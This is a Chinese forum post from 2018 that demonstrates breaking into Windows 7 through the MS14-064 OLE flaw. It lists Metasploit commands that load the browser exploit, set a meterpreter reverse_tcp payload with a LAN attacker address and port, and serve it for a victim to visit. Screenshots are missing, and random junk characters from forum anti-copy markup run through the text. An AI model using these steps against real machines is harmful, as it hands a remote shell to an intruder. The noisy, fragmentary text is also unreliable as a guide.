找回密码
 立即注册
查看: 2048|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

" `% M+ E i5 j4 z 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 ! }2 ]8 e) l2 Z) p3 B# R4 }) U

2 U% X9 T/ v( \- T

% R: }/ v; e+ h" j 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 9 y9 r1 l7 r/ S: j2 U) a

- N/ _& O" e) Q, H- d7 @1 X

9 J( ?% E! q, n5 R L2 _ 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp 8 h: e' x2 S8 p3 |2 L" [

. F8 r/ @2 C& w

! ~( K- ?+ P. n A* J# S. W5 l             set AllowPowershellPrompt true" u! `/ X: I' M6 p; q' w

0 K: B$ M5 i! {

! K0 B# v; ?. z$ ~' T. Q$ \             Set LHOST 192.168.0.109" z2 k9 \ [! D4 R: v/ F

5 H- |( D1 l C7 [

4 k4 S' S6 V3 ^# v( s             set SRVHOST 192.168.0.109 1 |& H/ d" t1 i: a/ ~; l' y6 O; m

, F! o' I8 b2 J M$ I& b" J' e

1 h6 i$ U+ W) o) L5 r) W             Set uripath share+ u6 @* O1 C% `' `) u( }8 `6 d

3 I; `- N' ^( Q; e/ A$ H+ Z! {% ?- T$ ]

' F1 J8 H1 G! Q7 Y; J( E; | d             Set srvport 80 1 [1 \" _6 B I, T/ v; ~* D/ C9 d1 J$ Z

- m7 f# [/ T; O

$ f+ `5 ?( g. `3 R  # ^/ c; x& E: z$ i, q; X

2 s, K# f7 |$ W6 _

9 ~$ D, M4 k+ f4 \  2 o% P4 j. c% U

* ^+ y- H7 n, G

# R5 B9 r5 {* b* z/ a2 Q   $ x: O+ V1 y, s c0 }8 s

0 t8 d$ n, Y M# a0 l4 |

% \3 {1 `+ G3 c6 z3 k7 t6 n$ J  4 ]4 G& L1 K- Q+ L

" @ C9 j$ _3 d, E( h2 |) [9 e, r

5 P) I- u @; B6 Q) Z0 d* V  ; J% K2 ]1 t6 c# D9 l2 X1 _

. ^1 \: |! D) q) d, i7 p

2 I% j; q, ?. B& h7 S 下面我们来访问本地地址如图:: z+ j0 J1 Y* a* P4 x; f6 m- C4 {; b

1 P+ \* C& ]) C/ ^+ j& n

; a$ k$ J$ y: ~$ e. }   / E( d* U0 S8 y: j) ^9 `

g& L# h$ i7 a0 v

, [! V- n% Y) v. j  8 P4 \6 C2 X: ^0 Q/ g# C# X

* g; X' Q" g0 C8 x/ c9 x& f( M

7 `$ y2 J2 Z8 ^) Q% A7 p, I ( T% n) }! }8 @" _3 E& I

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表